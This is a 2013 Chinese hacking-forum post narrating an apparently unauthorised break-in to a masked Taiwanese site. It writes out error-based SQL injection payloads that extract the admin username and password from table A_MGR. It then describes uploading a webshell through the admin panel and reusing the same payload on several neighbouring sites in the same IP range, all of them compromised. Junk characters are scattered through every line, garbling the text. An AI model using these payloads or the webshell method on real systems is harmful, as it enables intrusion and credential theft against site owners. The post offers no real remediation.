发现一个注入点3 k; X; `, s! _; a* ~, ~# f
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389) Q# J/ E/ j8 u7 o
! k" N: x( |4 j2 J' F, R习惯性的加’having1=1--$ ]/ S( o" }$ C2 E( `3 J$ r! h, C
4 s8 {4 ?# H/ n0 {$ ohttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
( A# v6 m9 v/ A; x/ r# Z
' a/ w& @( C3 p03 h0 V0 e4 ^( J6 y" r7 H' f
8 L6 P: T; e0 f3 u; G! A0 X' }6 O
爆出Diary_A.dl_Title(这时候很激动啊)
. r7 g2 H' s2 [1 j8 x6 b# T2 \* _6 `5 e
& T+ K3 M& N( J- t- Q那么继续+ m8 t ]) E/ k$ y' Q! K* @
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—8 n$ y9 E/ ?9 l" u- \' U$ @
( N& ~1 O. S% B! B8 n继续,一直爆下去& M8 z: B5 |8 t( F6 }, G
. @: T8 n8 K+ F' S; H
爆到几个字段和表段 但是没找到需要的管理用户的字段9 O- O$ X0 E2 t& u
$ M$ d4 y- w& e; L) z蛋疼了 怎么办 然后去后台登陆页看源码& ?7 x. s: t& T: o$ B: N
( F( F+ Q3 b- Y! A/ M& }' j06 F0 m. ~$ T8 H
2 \& a$ C( r+ x2 [$ i5 ?; t% S
Input name= “ADUID”
) O. I% y$ a& F) h5 Z! b# K' l" MInput name= “ADPWD”
I. {7 ?! K# i: V
3 U4 k1 I0 k; h# `( H1 l& u很幸运 找到了字段那就继续" k8 q( V: I& G T7 T' z% b/ f
找到之后开始爆用户- B9 \ r9 l% \( o6 `
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—! F( _$ ^! T' W Q; z0 G) k Q
爆密码
7 y! v! K! m0 N. a! j1 Qhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
7 {. F6 Q* K, A1 C0 d1 \测试了下 这个注入点只能爆到文章哪里的表 5 X; y0 q, Q! q+ u6 r& v% E0 {
X0 D/ s! H5 b: M5 \& i& `头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了2 j6 M( u' c) `7 d H
G# z; W. l5 ^ B
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
; ?' a( j: j3 v8 y# N& d( y( }1 [ K% V7 r) R* ?
473
4 I* g7 {. s' k. h
0 S6 } P+ H. z% ~: S% P进后台
, Z+ g: e' t; B( F1 a# @ X! C: l$ l l7 @, W6 u; a
; N/ P9 _7 P- j发现几个上传点 有的地方不能上传 而且防止恶意代码
S4 C6 w2 G# W* q: s) W4 h2 _; N8 {: w( P
没办法 各种百度各种找大牛 找到一只好像可以突破的马$ I" M7 a8 D1 R4 P2 j; j3 n
9 }3 g( l9 i5 \" S) S
% ] b) t6 T* v7 X3 n
在系统管理那里直接上传 不过没有显示地址
) v+ R2 P h$ \7 d5 p
: ~' S! F( G. q! ~$ \/ I6 A! v& {再上传一次 抓包 搞定OK
; T, j! I, E% d4 Z7 r. V8 s
( _4 u0 e$ v7 r% u; f5 S l- \
& [) f: z# g0 N8 y& U- k+ ?3 M9 p* i. b5 g' U0 _/ A
472
$ n4 @3 W2 g. ?+ T7 S( h
4 j7 z/ r( v$ H! {6 a5 t) U2 @晚上不行了 去睡觉。。。
5 V! b( D/ U% A6 h3 E; j第二天刚起床 闲的没事做继续日站吧 $ I8 G: l. y6 R, b" Y5 j5 a
. f/ X0 s- z: a# x3 y
找个站 就把这个站的旁c扫了下
: h3 _: s$ c, g- e, {# M/ N
* c$ \: ^% b+ A) u9 Q0 B( L% q& n发现c段也有一个购物站 ,然后还和这个站的模板差不多
' X4 w, L+ |+ i5 H
5 D* h& b' W' t4 |就找到会员登录口测试
7 _' F) W9 {2 h1 L* l( s2 G0 [: i W x/ K
'and (select top 1 MGR_UID from A_MGR)>0—
: M+ \% ]4 j' G- W果断爆到了 这时候我很激动 通杀- M! {* |5 v( X. A$ Z
% z1 I5 e; B8 T# j
再次翻c段9 Y) B& R( v: s+ d- Z6 R
5 A- U' _9 I8 k4 K( C翻出几个站 都成功拿下
; q4 | {4 j# H, R8 k9 I1 E; @7 G
3 {0 h, X) c9 v$ x# Q$ Q" a* R f, u3 ~& A2 O' c' h/ ]
修复方案:
# C0 r! y; x+ a他们比我专业
" @, P8 V' v3 l; a6 e$ @2 G( C
: f0 r/ D" x" l1 ?, S% L4 X8 C6 `0 t) `$ X
: Y( f+ B9 T/ Q
|
发表于 2013-4-4 17:40:38
收藏
支持
反对